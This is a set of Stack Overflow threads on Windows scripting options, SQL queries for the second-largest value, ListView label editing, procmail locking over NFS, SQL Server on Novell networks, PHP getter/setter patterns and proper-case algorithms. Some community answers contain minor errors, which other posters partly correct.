Q: What tools and languages are available for windows shell scripting? I want to know what the options are for doing scripting jobs on the Windows platform. I need functionality like file manipulation, registry editing, etc. Can files be edited using scripting tools? What other functionality do Windows scripting tools offer? Can everything that can be done using the Windows GUI be done using a scripting language? A: I think Windows PowerShell from Microsoft is the current favourite for this sort of thing. A: It might be worth looking at the prerelease of version 2.0. A lot of stuff has changed: http://blogs.msdn.com/powershell/archive/2007/11/06/what-s-new-in-ctp-of-powershell-2-0.aspx A: How about installing a Windows version of Python, Perl or your favorite language? These should offer all the functionality you need. A: Batch files are the most portable, but doing complicated things can get hard (very hard). PowerShell is incredibly - um - powerful, but the installed base at the moment is little more than the people who like using PowerShell and the servers they administer. If you control the machines you're scripting on and can mandate that PowerShell is installed, PowerShell is the way to go. Otherwise, batch files are the best way. PowerShell lets you do anything which can be done, but some things will be harder than others :) (Seriously, if you want to control a windows GUI app from a script, you're going to have a lot of pain unless the app supports scripting itself, or you want to start posting messages to dialog controls and screen scraping the dialog to check for success.) A: I would recommend "Take Command" (JPSoft), which is more like "cmd.exe" than PowerShell. We've used it here at ESSS for years. A: Windows Scripting Languages Also take a look at PowerShell A: CScript? I remember seeing something like that. A: PowerShell is nice, but it's an extra thing you have to install; it isn't standard in most Windows installations. So, if it's just for your own use, then PowerShell should be fine. If you need the scripts to run on the computers of the general population, for instance as part of a piece of software you are producing, it may not be the best option. If you are OK with an extra thing you have to install, you might want to check out Cygwin. This allows you to have a full Linux bash command line and all the associated tools at your disposal. If you need something included in a default Windows install, there's the Windows command line (cmd.exe), which has some functionality but is very deficient compared to what's available in Linux. The other, probably worse, problem is that there isn't much out there in the way of documentation. You might also be interested in VBScript (flame away). VBScript should work on almost any recent standard Windows install, and is a lot more functional than the command line. A: I have Cygwin installed, so I can run bash shell scripts for my automation needs. Besides, when I need stuff running more or less natively on Windows, I use a combination of batch + JScript (it runs on the command line if you have Visual Studio .NET installed; just call "cscript XXX.js"). A: Scripting is a blast. Personally I like to write some evil little batch files. You can find a command-line program to do just about anything. I prefer batch files mostly because they are portable from one machine to another with at most a zip with a few Unix tools (SSED, GREP, GAWK). There is a command-line REG.exe that can even do Registry changes and reads. 
You can parse output from commands with a "FOR /f" loop. PowerShell does have more... err.. Power (2nd post I wrote that in, but I can't help it.) If you want to look at Windows automation, check out AutoHotKey. What are you trying to automate? That may help us narrow down what would be helpful. - Josh EDIT: for the record, I typed that at the same time as @jameso. If someone at work hadn't asked me a question, I might have posted before him. I did get a bit of a shiver at the similarity of the posts though.... A: PowerShell can do what you need. File manipulation: this SO post answers how you can replace a string in your text file. Pasting it here for easy reference: (Get-Content c:\temp\test.txt).replace('[MYID]', 'MyValue') | Set-Content c:\temp\test.txt There are other things that you can do, such as copying files and folders. You can find out more in the Windows PowerShell documentation. Registry editing: this can easily be done using PowerShell. Here's sample code from the Microsoft Dev Blogs: Set-ItemProperty -Path HKCU:\Software\hsg -Name newproperty -Value anewvalue A: Yesterday I could have repaired this for you ;) "What all are the tools/languages for windows shell scripting?" would read better as "What tools and languages are available for windows shell scripting?"
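Picking up the FOR /f mention above, a small batch sketch; the command being parsed is just an example (inside a .bat file use %%L, at an interactive prompt a single %L):

@echo off
rem Capture each line of a command's output; %%L holds the line text.
rem The pipe inside the FOR /f command must be escaped with ^.
FOR /f "tokens=*" %%L IN ('ipconfig ^| find "IPv4"') DO echo Found: %%L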
{ "language": "en", "url": "https://stackoverflow.com/questions/32087", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: What is the simplest SQL Query to find the second largest value? What is the simplest SQL query to find the second largest integer value in a specific column? There may be duplicate values in the column. A: The easiest would be to get the second value from this result set in the application: SELECT DISTINCT value FROM Table ORDER BY value DESC LIMIT 2 But if you must select the second value using SQL, how about: SELECT MIN(value) FROM ( SELECT DISTINCT value FROM Table ORDER BY value DESC LIMIT 2 ) AS t A: SELECT MAX(col) FROM table WHERE col NOT IN ( SELECT MAX(col) FROM table ); A: A very simple query to find the second largest value: SELECT `Column` FROM `Table` ORDER BY `Column` DESC LIMIT 1,1; A: You can find the second largest value of a column by using the following query: SELECT * FROM TableName a WHERE 2 = (SELECT count(DISTINCT(b.ColumnName)) FROM TableName b WHERE a.ColumnName <= b.ColumnName); You can find more details at the following link: http://www.abhishekbpatel.com/2012/12/how-to-get-nth-maximum-and-minimun.html A: MSSQL SELECT * FROM [Users] order by UserId desc OFFSET 1 ROW FETCH NEXT 1 ROW ONLY; MySQL SELECT * FROM Users order by UserId desc LIMIT 1 OFFSET 1 No need for subqueries ... just skip one row and select the second row after ordering descending A: SELECT MAX(Salary) FROM Employee WHERE Salary NOT IN ( SELECT MAX(Salary) FROM Employee ) This query returns the maximum salary from a result set that does not contain the overall maximum salary of the table. A: SELECT MAX( col ) FROM table WHERE col < ( SELECT MAX( col ) FROM table ) A: In T-SQL there are two ways: --filter out the max select max( col ) from [table] where col < ( select max( col ) from [table] ) --sort top two then bottom one select top 1 col from ( select top 2 col from [table] order by col desc ) topTwo order by col In Microsoft SQL the first way is twice as fast as the second, even if the column in question is clustered. This is because the sort operation is relatively slow compared to the table or index scan that the max aggregation uses. Alternatively, in Microsoft SQL 2005 and above you can use the ROW_NUMBER() function: select col from ( select ROW_NUMBER() over (order by col asc) as 'rowNum', col from [table] ) withRowNum where rowNum = 2 A: Simplest of all: select sal from salary order by sal desc limit 1 offset 1 A: Old question I know, but this gave me a better exec plan: SELECT TOP 1 LEAD(MAX (column)) OVER (ORDER BY column desc) FROM TABLE GROUP BY column A: This is very simple code, you can try this. Example: table name = test salary 1000 1500 1450 7500 MSSQL code to get the 2nd largest value: select salary from test order by salary desc offset 1 rows fetch next 1 rows only; Here 'offset 1 rows' skips to the 2nd row of the table and 'fetch next 1 rows only' shows only that 1 row. If you don't use 'fetch next 1 rows only' then it shows all the rows from the second row onward. A: I see both some SQL Server specific and some MySQL specific solutions here, so you might want to clarify which database you need. Though if I had to guess I'd say SQL Server, since this is trivial in MySQL. I also see some solutions that won't work because they fail to take into account the possibility of duplicates, so be careful which ones you accept. Finally, I see a few that will work but that will make two complete scans of the table. You want to make sure the 2nd scan is only looking at 2 values. 
SQL Server (pre-2012): SELECT MIN([column]) AS [column] FROM ( SELECT TOP 2 [column] FROM [Table] GROUP BY [column] ORDER BY [column] DESC ) a MySQL: SELECT `column` FROM `table` GROUP BY `column` ORDER BY `column` DESC LIMIT 1,1 Update: SQL Server 2012 now supports a much cleaner (and standard) OFFSET/FETCH syntax: SELECT [column] FROM [Table] GROUP BY [column] ORDER BY [column] DESC OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY; A: I suppose you can do something like: SELECT * FROM Table ORDER BY NumericalColumn DESC LIMIT 1 OFFSET 1 or SELECT * FROM Table ORDER BY NumericalColumn DESC LIMIT (1, 1) depending on your database server. Hint: SQL Server doesn't do LIMIT. A: select * from (select ROW_NUMBER() over (Order by Col_x desc) as Row, Col_1 from table_1)as table_new tn inner join table_1 t1 on tn.col_1 = t1.col_1 where row = 2 Hope this helps to get the value for any row. A: Use this query: SELECT MAX( colname ) FROM Tablename where colname < ( SELECT MAX( colname ) FROM Tablename) A: Tom, I believe this will fail when there is more than one value returned by the select max([COLUMN_NAME]) from [TABLE_NAME] section, i.e. where there are more than 2 values in the data set. A slight modification to your query will work: select max([COLUMN_NAME]) from [TABLE_NAME] where [COLUMN_NAME] NOT IN ( select max([COLUMN_NAME]) from [TABLE_NAME] ) A: select max(COL_NAME) from TABLE_NAME where COL_NAME in ( select COL_NAME from TABLE_NAME where COL_NAME < ( select max(COL_NAME) from TABLE_NAME ) ); The subquery returns all values other than the largest; select the max value from the returned list. A: select min(sal) from emp where sal in (select TOP 2 sal from emp order by sal desc) Note: sal is the column name and emp is the table name. A: select col_name from ( select dense_rank() over (order by col_name desc) as 'rank', col_name from table_name ) withrank where rank = 2 A: SELECT * FROM table WHERE column < (SELECT max(column) FROM table) ORDER BY column DESC LIMIT 1 A: This is another way to find the second largest value of a column. Consider the table 'Student' and column 'Age'. Then the query is: select top 1 Age from Student where Age in ( select distinct top 2 Age from Student order by Age desc ) order by Age asc A: This is the easiest way: SELECT Column name FROM Table name ORDER BY Column name DESC LIMIT 1,1 A: select age from student group by id having age < ( select max(age) from student ) order by age desc limit 1 A: As you mentioned, there may be duplicate values. In such a case you may use DISTINCT or GROUP BY to find the second highest value. Here is a table salary: GROUP BY SELECT amount FROM salary GROUP by amount ORDER BY amount DESC LIMIT 1 , 1 DISTINCT SELECT DISTINCT amount FROM salary ORDER BY amount DESC LIMIT 1 , 1 First portion of LIMIT = starting index. Second portion of LIMIT = how many values. A: SELECT MAX(sal) FROM emp WHERE sal NOT IN ( SELECT top 2 sal FROM emp order by sal desc ) This will return the third highest sal of the emp table. A: select max(column_name) from table_name where column_name not in ( select max(column_name) from table_name ); not in is a condition that excludes the highest value of column_name. Reference: programmer interview A: select top 1 MyIntColumn from MyTable where MyIntColumn <> (select top 1 MyIntColumn from MyTable order by MyIntColumn desc) order by MyIntColumn desc A: This works in MS SQL: select max([COLUMN_NAME]) from [TABLE_NAME] where [COLUMN_NAME] < ( select max([COLUMN_NAME]) from [TABLE_NAME] ) A: Something like this? 
I haven't tested it, though: select top 1 x from ( select distinct top 2 x from y order by x desc ) z order by x A: See How to select the nth row in a SQL database table?. Sybase SQL Anywhere supports: SELECT TOP 1 START AT 2 value from table ORDER BY value A: select * from emp e where 3 >= (select count(distinct salary) from emp where e.salary <= salary) This query selects the top three salaries. If two employees have the same salary, this does not affect the query. A: Using a correlated query: Select * from x x1 where 1 = (select count(*) from x where x1.a < a) A: Query to find the 2nd highest number in a column: select Top 1 (salary) from XYZ where Salary not in (select distinct TOP 1 (salary) from XYZ order by Salary desc) ORDER BY Salary DESC By changing the highlighted TOP 1 to TOP 2, 3 or 4 you can find the 3rd, 4th and 5th highest respectively. A: We can also make use of order by and top 1 element as follows: Select top 1 col_name from table_name where col_name < (Select top 1 col_name from table_name order by col_name desc) order by col_name desc A: SELECT * FROM EMP WHERE salary= (SELECT MAX(salary) FROM EMP WHERE salary != (SELECT MAX(salary) FROM EMP) ); A: Try: select a.* ,b.* from (select * from (select ROW_NUMBER() OVER(ORDER BY fc_amount desc) SrNo1, fc_amount as amount1 From entry group by fc_amount) tbl where tbl.SrNo1 = 2) a , (select * from (select ROW_NUMBER() OVER(ORDER BY fc_amount asc) SrNo2, fc_amount as amount2 From entry group by fc_amount) tbl where tbl.SrNo2 =2) b A: select * from [table] where (column)=(select max(column)from [table] where column < (select max(column)from [table])) A: select MAX(salary) as SecondMax from test where salary != (select MAX(salary) from test) A: select score from table where score = (select max(score)-1 from table) A: Microsoft SQL Server - Using Two TOPs for the N-th highest value (aliased sub-query). To solve for the 2nd highest: SELECT TOP 1 q.* FROM (SELECT TOP 2 column_name FROM table_name ORDER BY column_name DESC) as q ORDER BY column_name ASC; Uses TOP twice, but requires an aliased sub-query. Essentially, the inner query takes the greatest 2 values in descending order, then the outer query flips them into ascending order so that the 2nd highest is now on top. The SELECT statement returns this top row. To solve for the n-th highest value, modify the sub-query TOP value. For example: SELECT TOP 1 q.* FROM (SELECT TOP 5 column_name FROM table_name ORDER BY column_name DESC) as q ORDER BY column_name; would return the 5th highest value. A: select extension from [dbo].[Employees] order by extension desc offset 1 rows fetch next 1 rows only A: Very simple. The distinct keyword will take care of duplicates as well. SELECT distinct SupplierID FROM [Products] order by SupplierID desc limit 1 offset 1 A: The easiest way to get the second-to-last row from a SQL table is to use ORDER BY ColumnName DESC and set LIMIT 1,1. Try this: SELECT * from `TableName` ORDER BY `ColumnName` DESC LIMIT 1,1 A: SELECT * FROM `employee` WHERE employee_salary = (SELECT employee_salary FROM `employee` GROUP BY employee_salary ORDER BY employee_salary DESC LIMIT 1,1) A: You can find the nth highest value using the following query: select top 1 UnitPrice from (select distinct top n UnitPrice from [Order Details] order by UnitPrice desc) as Result order by UnitPrice asc Here, the value of n will be 1 (for the highest number), 2 (for the second highest number), 3 (for the third highest number)... 
A: First make a derived table without the max salary, then query the max value from that derived table: SELECT max(salary) from (Select * FROM emp WHERE salary <> (SELECT MAX(salary) from emp)) temp
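A quick worked check of the duplicate-handling caveat raised in an earlier answer, using an assumed table t with values 10, 20, 20, 30, 30:

-- Without DISTINCT, "TOP 2 ... ORDER BY col DESC" sees 30, 30 and the
-- outer MIN wrongly returns 30; adding DISTINCT fixes it:
SELECT MIN(col) FROM (SELECT DISTINCT TOP 2 col FROM t ORDER BY col DESC) AS q;  -- returns 20

-- The comparison form needs no DISTINCT, since MAX collapses duplicates:
SELECT MAX(col) FROM t WHERE col < (SELECT MAX(col) FROM t);                     -- returns 20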
{ "language": "en", "url": "https://stackoverflow.com/questions/32100", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "200" }
Q: how do you programmatically invoke a listview label edit in C# I'd like to invoke the label edit of a newly added item to a ListView. Basically, if I have a "click here to add" scenario, as soon as the new item is added, I want the text label to be in a user-editable state. Thanks! A: found it! ListViewItem.BeginEdit();
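For anyone needing the surrounding setup, a minimal sketch (control and item names invented); note that the ListView's LabelEdit property must be true before calling BeginEdit:

// assumes a WinForms ListView named listView1
listView1.LabelEdit = true;
ListViewItem item = listView1.Items.Add("New item");
item.BeginEdit(); // puts the new item's label into edit mode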
{ "language": "en", "url": "https://stackoverflow.com/questions/32103", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "10" }
Q: procmail lockfile utility and NFS Has anyone used the lockfile utility that ships with procmail in conjunction with NFS-mounted directories? The lockfile man page states that "Lockfile is NFS-resistant and eight-bit clean." A: I've used it. My company had a very NFS-intensive infrastructure at one point (less so now) and many Perl sysadmin tools dating back to the mid-90s. We wrapped lockfile in a Perl module so that we could do consistent locking across NFS mounts. For that matter, our home directories were NFS-mounted and we used procmail to deliver mail into them using the same style of locking, and never had any problems with it (procmail delivering mail via NFS from server-a and mail being read via direct file access or UW-IMAP from a bunch of other servers).
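For reference, the basic usage pattern looks like this; the paths and retry count here are just an example:

# create the lock (retrying a few times before giving up), do the
# NFS-sensitive work, then remove the lockfile to release it
lockfile -r 3 /var/mail/mbox.lock || exit 1
# ... critical section over the NFS mount ...
rm -f /var/mail/mbox.lock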
{ "language": "en", "url": "https://stackoverflow.com/questions/32123", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: Why can't SQL Server run on a Novell server? I'm not sure whether I'm asking the question correctly, but I've been told SQL Server cannot run on a Novell server. Is this true? If yes, why not? A: Your problem is your directory service, whether it's Microsoft's Active Directory or Novell Directory Services. Sounds to me like your DNS is broken if your clients can't resolve names to IP addresses. A: You may have to be more specific about what a "Novell server" is. From what I understand, Novell servers run some form of SUSE Linux. SQL Server is a Windows-only product. My company, however, does have clients that run Novell networks, and we do run SQL Servers on their networks. But they're hosted on a Windows box... A: NOW I see your problem! Sorry dude! Yes, VERY easy. Kinda. SQL Server used to be able to talk IPX (the NetWare protocol), but I think NetWare will now talk TCP/IP, and you can run IPX and TCP/IP on the same network without an issue - Windows clients can run both at the same time, 99% of routers handle all protocols, etc. Windows (XP/2003/etc.) can run the NetWare client, so it can talk to shares etc. Use SQL Server logins (rather than Windows integrated logins), and it'll work from anything - we have Java on Linux talking to SQL Server on Windows just fine :) It's all in the connection string: userid=username;pwd=whatever;server=yourserverhere; etc. But you MUST use the SQL Server Configuration Manager to set these up - the default is shared memory, so you have to enable TCP/IP etc. A: SQL Server is a Windows app. A Novell server is either one of: NetWare or Linux. Neither of these is Windows :) It's like asking "why can't I run this Mac application on my windows box". Or "why will my petrol car not run on diesel?" There are old versions of Sybase, which SQL Server sprang from, which COULD run on Novell NetWare, but you'd need to find a software museum to find one, I think! If you need a SQL Server, I'd suggest you either get Small Business Server, which comes with MSSQL, or install one of the free editions of SQL Server on XP or Windows 2003 Server. Or use something like MySQL or Postgres on Linux. A: I'm not sure what you are asking. Are you looking for software to allow NetWare applications to talk to a SQL Server running on Windows? The wording of your original question implied that you want SQL Server to run on the NetWare machine. The question of why SQL Server doesn't support NetWare is best asked of Microsoft, but AFAIK SQL Server doesn't support any non-Windows OS. As someone else said, SQL Server originally came from Sybase's SQL Server (now called Adaptive Server Enterprise), which supported NetWare at one time but dropped it a long time ago. Sybase's other RDBMS, SQL Anywhere, dropped NetWare as of version 11, but versions 9 and 10 are still supported on NW. A: OK, now I think I understand. I was thinking "client" as in database client application, not the Novell client. 
I don't think you'll need the Novell client on the Windows machine, for a couple of reasons: * *If the client is trying to connect over TCP/IP, it doesn't matter whether or not the Windows machine has the Novell client installed *Windows shares aren't affected by the Novell client, though you need some kind of Novell client for the Windows machine to map NetWare volumes *If the Windows machine does need to map NetWare volumes, I have found in the past that the Client Service for NetWare service (which ships with Windows but isn't installed by default) is sufficient, and doesn't have all the overhead of the Novell client. A: It sounds like your Windows SQL Server is in fact a second-class citizen on your networks. (I imagine you are using SQL Authentication instead of AD-based.) If you have to connect via IP rather than name, then your Windows boxes aren't participating in an Active Directory authentication + DNS setup, as is the case in most "Windows" networks, versus the "NetWare" network that you are running into. NetWare has its own form of directory services that is independent of Microsoft. If you want your Microsoft SQL Server to be an integral part of your network, then you need Microsoft Active Directory installed with integrated Windows authentication and DNS services running on a Domain Controller. But this would conflict with your directory services (if used) on your NetWare server. If your NetWare network is running just fine, then I wouldn't change it. Simply add the Microsoft SQL Server's network name to your local DNS services and it won't appear like it's a second-class citizen. You could install the NetWare client on the SQL machine, but that would make most DBAs cringe. But it would register the machine in NetWare's directory. A: SQL Server, although rooted in a Sybase/Unix/VMS background, is a native Windows application. Apart from the compact edition (which runs on some Windows mobile platforms), SQL Server runs on Windows desktop and server operating systems. More information can be found on Wikipedia. A: Sorry to be prickly, but I'm not a noob: I know you can't install SQL Server on Linux. Do you guys have customers running NetWare trying to connect to a SQL Server? That is what I am dealing with. We have customers, mostly school systems, that use NetWare as the "network OS" with many Windows workstations running the NetWare client. Our app uses SQL Server, which is usually installed on a Windows 2003 server, but the server is always a second-class citizen on the network. Users often must use the IP address rather than the machine name to connect to the SQL Server. @Will: Do your Novell customers have trouble accessing SQL Server on the Windows server? Can you install the NetWare client on the Windows server to enable file sharing? A: @Graeme: Thanks for helping me refine my question. My employer somehow has the impression that a Windows server is a second-class citizen on a NetWare network. Would installing the NetWare client on the Windows server make it easier for NetWare clients (with some form of Windows OS) to connect to the SQL Server? Would installing the NetWare client on the Windows server allow the server to share directories and files like a Novell server? A: @geoffcc: The app uses SQL Authentication to connect to SQL Server. A: The core issue is how you are authenticating to the SQL database. 
If you have an Active Directory tree and an eDirectory tree, you can easily link the two via Novell Identity Manager, which will synchronize users, groups, etc. (any object you care to map between the two systems) as well as passwords. Thus the same object exists in both locations, so each system can use it as much as it needs to. The license for Identity Manager is included with the Open Enterprise Server license (OES can run on NetWare or on SUSE Linux Enterprise Server (SLES)). Then you could use Active Directory integrated authentication. Beyond that, your NetWare server likely does not need to connect to the database directly. If it does, you will be writing or using an application that includes the database connectivity. At which point it becomes a question of whether there is a client for this OS or not. A: @flipdoubt Well, if you are using SQL Authentication, then you are using a SQL client of some kind to connect to it, and the fact you have Novell in the picture is as unrelated as if you had Banyan Vines. (There you go! Now a search will show at least ONE reference to Banyan Vines!! Every good technology site needs at least one, and probably not more than one!) As others have noted, what are you trying to do? If they need to use the IP address of the SQL server to connect to it via a SQL client, then you have a DNS problem. If you want to connect to the MS SQL server box to put a file on it, then that is somewhat unrelated to the SQL aspect of the issue. There again, DNS can solve your woes, if you register the name of the server (say it is SQLSERV1) with the default DNS name (say acme.com) tacked onto the end of it, so that the name sqlserv1.acme.com resolves to the IP number you want it to point at. 
Next comes the question of where the user identities are stored. You are using SQL Authentication, so that means you are creating accounts in SQL for each user. The basic alternative is to use Active Directory and have MS SQL Server use those identities. If you are in a non-AD shop, you can investigate the Novell Identity Manager product, which has a JDBC driver that can do a fair bit. One thing it can do is synchronize users from eDirectory to be SQL Server users. (Or to Active Directory, Lotus Notes, most LDAP directories, AS/400s, mainframes, NIS/NIS+ and many more systems).
Q: Is this a reasonable way to handle getters/setters in a PHP class? I'm going to try something with the format of this question and I'm very open to suggestions about a better way to handle it. I didn't want to just dump a bunch of code in the question so I've posted the code for the class on refactormycode. base class for easy class property handling My thought was that people can either post code snippets here or make changes on refactormycode and post links back to their refactorings. I'll make upvotes and accept an answer (assuming there's a clear "winner") based on that. At any rate, on to the class itself: I see a lot of debate about getter/setter class methods and is it better to just access simple property variables directly or should every class have explicit get/set methods defined, blah blah blah. I like the idea of having explicit methods in case you have to add more logic later. Then you don't have to modify any code that uses the class. However I hate having a million functions that look like this: public function getFirstName() { return $this->firstName; } public function setFirstName($firstName) { return $this->firstName; } Now I'm sure I'm not the first person to do this (I'm hoping that there's a better way of doing it that someone can suggest to me). Basically, the PropertyHandler class has a __call magic method. Any methods that come through __call that start with "get" or "set" are then routed to functions that set or retrieve values into an associative array. The key into the array is the name of the calling method after getting or setting. So, if the method coming into __call is "getFirstName", the array key is "FirstName". I liked using __call because it will automatically take care of the case where the subclass already has a "getFirstName" method defined. My impression (and I may be wrong) is that the __get & __set magic methods don't do that. So here's an example of how it would work: class PropTest extends PropertyHandler { public function __construct() { parent::__construct(); } } $props = new PropTest(); $props->setFirstName("Mark"); echo $props->getFirstName(); Notice that PropTest doesn't actually have "setFirstName" or "getFirstName" methods and neither does PropertyHandler. All that's doing is manipulating array values. The other case would be where your subclass is already extending something else. Since you can't have true multiple inheritances in PHP, you can make your subclass have a PropertyHandler instance as a private variable. You have to add one more function but then things behave in exactly the same way. class PropTest2 { private $props; public function __construct() { $this->props = new PropertyHandler(); } public function __call($method, $arguments) { return $this->props->__call($method, $arguments); } } $props2 = new PropTest2(); $props2->setFirstName('Mark'); echo $props2->getFirstName(); Notice how the subclass has a __call method that just passes everything along to the PropertyHandler __call method. Another good argument against handling getters and setters this way is that it makes it really hard to document. In fact, it's basically impossible to use any sort of document generation tool since the explicit methods to be don't documented don't exist. I've pretty much abandoned this approach for now. It was an interesting learning exercise but I think it sacrifices too much clarity. 
A: The way I do it is the following: class test { protected $x=''; protected $y=''; function set_y ($y) { print "specific function set_y\n"; $this->y = $y; } function __call($function , $args) { print "generic function $function\n"; list ($name , $var ) = split ('_' , $function ); if ($name == 'get' && isset($this->$var)) { return $this->$var; } if ($name == 'set' && isset($this->$var)) { $this->$var= $args[0]; return; } trigger_error ("Fatal error: Call to undefined method test::$function()"); } } $p = new test(); $p->set_x(20); $p->set_y(30); print $p->get_x(); print $p->get_y(); $p->set_z(40); Which will output (line breaks added for clarity) generic function set_x specific function set_y generic function get_x 20 generic function get_y 30 generic function set_z Notice: Fatal error: Call to undefined method set_z() in [...] on line 16 A: @Brian My problem with this is that adding "more logic later" requires that you add blanket logic that applies to all properties accessed with the getter/setter or that you use if or switch statements to evaluate which property you're accessing so that you can apply specific logic. That's not quite true. Take my first example: class PropTest extends PropertyHandler { public function __construct() { parent::__construct(); } } $props = new PropTest(); $props->setFirstName("Mark"); echo $props->getFirstName(); Let's say that I need to add some logic for validating FirstNames. All I have to do is add a setFirstName method to my subclass and that method is automatically used instead. class PropTest extends PropertyHandler { public function __construct() { parent::__construct(); } public function setFirstName($name) { if($name == 'Mark') { echo "I love you, Mark!"; } } } I'm just not satisfied with the limitations that PHP has when it comes to implicit accessor methods. I agree completely. I like the Python way of handling this (my implementation is just a clumsy rip-off of it). A: Yes that's right the variables have to be manually declared but i find that better since I fear a typo in the setter $props2->setFristName('Mark'); will auto-generate a new property (FristName instead of FirstName) which will make debugging harder. A: I like having methods instead of just using public fields, as well, but my problem with PHP's default implementation (using __get() and __set()) or your custom implementation is that you aren't establishing getters and setters on a per-property basis. My problem with this is that adding "more logic later" requires that you add blanket logic that applies to all properties accessed with the getter/setter or that you use if or switch statements to evaluate which property you're accessing so that you can apply specific logic. I like your solution, and I applaud you for it--I'm just not satisfied with the limitations that PHP has when it comes to implicit accessor methods. A: @Mark But even your method requires a fresh declaration of the method, and it somewhat takes away the advantage of putting it in a method so that you can add more logic, because to add more logic requires the old-fashioned declaration of the method, anyway. In its default state (which is where it is impressive in what it detects/does), your technique is offering no advantage (in PHP) over public fields. You're restricting access to the field but giving carte blanche through accessor methods that don't have any restrictions of their own. 
I'm not aware that unchecked explicit accessors offer any advantage over public fields in any language, but people can and should feel free to correct me if I'm wrong. A: I've always handled this issue in a similar with a __call which ends up pretty much as boiler plate code in many of my classes. However, it's compact, and uses the reflection classes to only add getters / setters for properties you have already set (won't add new ones). Simply adding the getter / setter explicitly will add more complex functionality. It expects to be Code looks like this: /** * Handles default set and get calls */ public function __call($method, $params) { //did you call get or set if ( preg_match( "|^[gs]et([A-Z][\w]+)|", $method, $matches ) ) { //which var? $var = strtolower($matches[1]); $r = new ReflectionClass($this); $properties = $r->getdefaultProperties(); //if it exists if ( array_key_exists($var,$properties) ) { //set if ( 's' == $method[0] ) { $this->$var = $params[0]; } //get elseif ( 'g' == $method[0] ) { return $this->$var; } } } } Adding this to a class where you have declared default properties like: class MyClass { public $myvar = null; } $test = new MyClass; $test->setMyvar = "arapaho"; echo $test->getMyvar; //echos arapaho The reflection class may add something of use to what you were proposing. Neat solution @Mark. A: Just recently, I also thought about handling getters and setters the way you suggested (the second approach was my favorite, i.e. the private $props array), but I discarded it for it wouldn't have worked out in my app. I am working on a rather large SoapServer-based application and the soap interface of PHP 5 injects the values that are transmitted via soap directly into the associated class, without bothering about existing or non-existing properties in the class. A: I can't help putting in my 2 cents... I have taken to using __get and __set in this manor http://gist.github.com/351387 (similar to the way that doctrine does it), then only ever accessing the properties via the $obj->var in an outside of the class. That way you can override functionality as needed instead of making a huge __get or __set function, or overriding __get and __set in the child classes.
{ "language": "en", "url": "https://stackoverflow.com/questions/32145", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "8" }
Q: Does anyone have a good Proper Case algorithm Does anyone have a trusted Proper Case or PCase algorithm (similar to a UCase or Upper)? I'm looking for something that takes a value such as "GEORGE BURDELL" or "george burdell" and turns it into "George Burdell". I have a simple one that handles the simple cases. The ideal would be to have something that can handle things such as "O'REILLY" and turn it into "O'Reilly", but I know that is tougher. I am mainly focused on the English language if that simplifies things. UPDATE: I'm using C# as the language, but I can convert from almost anything (assuming like functionality exists). I agree that the McDonald's scneario is a tough one. I meant to mention that along with my O'Reilly example, but did not in the original post. A: There's also this neat Perl script for title-casing text. http://daringfireball.net/2008/08/title_case_update #!/usr/bin/perl # This filter changes all words to Title Caps, and attempts to be clever # about *un*capitalizing small words like a/an/the in the input. # # The list of "small words" which are not capped comes from # the New York Times Manual of Style, plus 'vs' and 'v'. # # 10 May 2008 # Original version by John Gruber: # http://daringfireball.net/2008/05/title_case # # 28 July 2008 # Re-written and much improved by Aristotle Pagaltzis: # http://plasmasturm.org/code/titlecase/ # # Full change log at __END__. # # License: http://www.opensource.org/licenses/mit-license.php # use strict; use warnings; use utf8; use open qw( :encoding(UTF-8) :std ); my @small_words = qw( (?<!q&)a an and as at(?!&t) but by en for if in of on or the to v[.]? via vs[.]? ); my $small_re = join '|', @small_words; my $apos = qr/ (?: ['’] [[:lower:]]* )? /x; while ( <> ) { s{\A\s+}{}, s{\s+\z}{}; $_ = lc $_ if not /[[:lower:]]/; s{ \b (_*) (?: ( (?<=[ ][/\\]) [[:alpha:]]+ [-_[:alpha:]/\\]+ | # file path or [-_[:alpha:]]+ [@.:] [-_[:alpha:]@.:/]+ $apos ) # URL, domain, or email | ( (?i: $small_re ) $apos ) # or small word (case-insensitive) | ( [[:alpha:]] [[:lower:]'’()\[\]{}]* $apos ) # or word w/o internal caps | ( [[:alpha:]] [[:alpha:]'’()\[\]{}]* $apos ) # or some other word ) (_*) \b }{ $1 . ( defined $2 ? $2 # preserve URL, domain, or email : defined $3 ? "\L$3" # lowercase small word : defined $4 ? "\u\L$4" # capitalize word w/o internal caps : $5 # preserve other kinds of word ) . $6 }xeg; # Exceptions for small words: capitalize at start and end of title s{ ( \A [[:punct:]]* # start of title... | [:.;?!][ ]+ # or of subsentence... | [ ]['"“‘(\[][ ]* ) # or of inserted subphrase... ( $small_re ) \b # ... followed by small word }{$1\u\L$2}xig; s{ \b ( $small_re ) # small word... (?= [[:punct:]]* \Z # ... at the end of the title... | ['"’”)\]] [ ] ) # ... or of an inserted subphrase? }{\u\L$1}xig; # Exceptions for small words in hyphenated compound words ## e.g. "in-flight" -> In-Flight s{ \b (?<! -) # Negative lookbehind for a hyphen; we don't want to match man-in-the-middle but do want (in-flight) ( $small_re ) (?= -[[:alpha:]]+) # lookahead for "-someword" }{\u\L$1}xig; ## # e.g. "Stand-in" -> "Stand-In" (Stand is already capped at this point) s{ \b (?<!…) # Negative lookbehind for a hyphen; we don't want to match man-in-the-middle but do want (stand-in) ( [[:alpha:]]+- ) # $1 = first word and hyphen, should already be properly capped ( $small_re ) # ... followed by small word (?! - ) # Negative lookahead for another '-' }{$1\u$2}xig; print "$_"; } __END__ But it sounds like by proper case you mean.. for people's names only. 
